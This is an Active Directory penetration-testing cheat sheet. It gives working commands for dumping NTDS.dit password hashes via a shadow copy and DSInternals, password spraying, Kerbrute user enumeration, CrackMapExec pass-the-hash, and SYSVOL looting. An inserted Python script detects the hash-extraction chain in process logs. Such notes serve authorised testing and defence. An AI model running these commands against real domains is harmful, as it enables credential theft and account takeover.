🔧 Testing Active Directory

Tools

Install DSInternals using PowerShell

# Unrestricted applies to every script on the host; RemoteSigned (or -Scope Process) is the narrower setting
Set-ExecutionPolicy Unrestricted
Install-Module -Name DSInternals

Install Impacket in Linux

sudo apt install python3-impacket

Install BloodHound in Linux

sudo apt install bloodhound   # GUI client and its database
pip install bloodhound        # Python ingestor (BloodHound.py)

Install Kerbrute

Install Crackmapexec

sudo apt install crackmapexec


Extract the AD hashes

reg SAVE HKLM\SYSTEM c:\temp\sys

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\temp\dit

ESENTUTL /p c:\temp\dit /!1024 /8 /o

$key = Get-BootKey -SystemHiveFilePath c:\temp\sys

Get-ADDBAccount -All -BootKey $key -DBPath c:\temp\dit
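The four commands above (SYSTEM hive export, shadow copy, copy of ntds.dit out of the shadow, esentutl repair) are also the detection surface for this technique. The following is an added example, not part of the original notes: it runs the chain over process-creation command lines (Security event 4688 with command-line auditing enabled) exported as dictionaries. The record layout, the sample events and the function names are my own assumptions.

```python
"""Detect the ntds.dit extraction chain above in process-creation telemetry.

Added example, not part of the original notes. It assumes the command lines
from Security event 4688 (process creation, with command-line auditing on)
have been exported as dictionaries; the records below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real logs): a DC where the four commands
# from the notes ran in sequence, a backup server that legitimately creates a
# shadow copy, and a workstation that only listed shadows.
SAMPLE_PROCESS_EVENTS = [
    {"time": "2024-03-01T22:10:01", "host": "DC01", "user": "CORP\\svc-backup",
     "cmd": r"reg SAVE HKLM\SYSTEM c:\temp\sys"},
    {"time": "2024-03-01T22:10:05", "host": "DC01", "user": "CORP\\svc-backup",
     "cmd": "vssadmin create shadow /for=C:"},
    {"time": "2024-03-01T22:10:20", "host": "DC01", "user": "CORP\\svc-backup",
     "cmd": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\temp\dit"},
    {"time": "2024-03-01T22:11:02", "host": "DC01", "user": "CORP\\svc-backup",
     "cmd": r"ESENTUTL /p c:\temp\dit /!1024 /8 /o"},
    {"time": "2024-03-01T23:00:00", "host": "BACKUP01", "user": "CORP\\svc-backup",
     "cmd": "vssadmin create shadow /for=C:"},
    {"time": "2024-03-01T23:05:00", "host": "WS07", "user": "CORP\\jdoe",
     "cmd": "vssadmin list shadows"},
]

# One regex per stage of the chain. The esentutl stage cannot key on the file
# name: the copy was renamed to "dit", so only the repair switch is left.
STAGES = {
    "system_hive_export": re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\SYSTEM\b", re.I),
    "shadow_copy_created": re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I),
    "ntds_copied_from_shadow": re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\.dit", re.I),
    "ese_repair": re.compile(r"\besentutl(\.exe)?\s+/p\b", re.I),
}


def classify(cmd):
    """Return the names of every stage the command line matches."""
    return [name for name, rx in STAGES.items() if rx.search(cmd)]


def find_extraction_chains(events, window=timedelta(hours=1)):
    """Per host, find the window holding the most distinct stages.

    A single stage (a shadow copy on a backup server, a repair of some other
    ESE database) is common and rated low; two or more stages on the same host
    inside the window are the extraction chain and rated high.
    """
    by_host = defaultdict(list)
    for e in events:
        for stage in classify(e["cmd"]):
            by_host[e["host"]].append((datetime.fromisoformat(e["time"]), stage, e["user"]))

    findings = {}
    for host, hits in by_host.items():
        hits.sort()
        best = None
        for t0, _stage, _user in hits:
            inside = [h for h in hits if t0 <= h[0] <= t0 + window]
            stages = {h[1] for h in inside}
            if best is None or len(stages) > len(best["stages"]):
                best = {
                    "stages": sorted(stages),
                    "users": sorted({h[2] for h in inside}),
                    "first": inside[0][0].isoformat(),
                    "last": inside[-1][0].isoformat(),
                }
        best["severity"] = "high" if len(best["stages"]) >= 2 else "low"
        findings[host] = best
    return findings


if __name__ == "__main__":
    for host, f in find_extraction_chains(SAMPLE_PROCESS_EVENTS).items():
        print(host, f["severity"], ", ".join(f["stages"]))
```

The per-host correlation is the point: each command on its own has a legitimate use, so a rule that fires on `vssadmin create shadow` alone pages on every backup job, while two stages within an hour on a domain controller is specific to this chain.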


Password spraying Active Directory

Import-Module c:\tools\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password kitty-kat
Invoke-DomainPasswordSpray -PasswordList c:\tools\adpass.txt


Kerberos brute-forcing attacks

Kerbrute

Username Enumeration

./kerbrute userenum -d cybex.com --dc <domain IP> <username list>

Password Attack

./kerbrute passwordspray -d cybex.com --dc <domain IP> <username list> <password>


CrackMapExec to access and enumerate AD

crackmapexec smb <ip/cidr>

Pass The Hash Attack

crackmapexec smb <domain IP> -u "<username>" -H "<NTLM hash>"
crackmapexec smb <domain IP> -u "<username>" -p <password.txt>


Investigate the SYSVOL share

smbclient \\\\<Domain IP address>\\sysvol -U <username>

Retrieve a File

smb> get <file name or file location>


Take advantage of legacy data

JXplorer

  • Open JXplorer

  • Enter the username and password

  • Select a user

  • Select the Table Editor tab on the right-hand side

  • Decode the info attribute value (base64 encoded)

Decode Base64 value

echo "<base64 encoded text>" | base64 -d
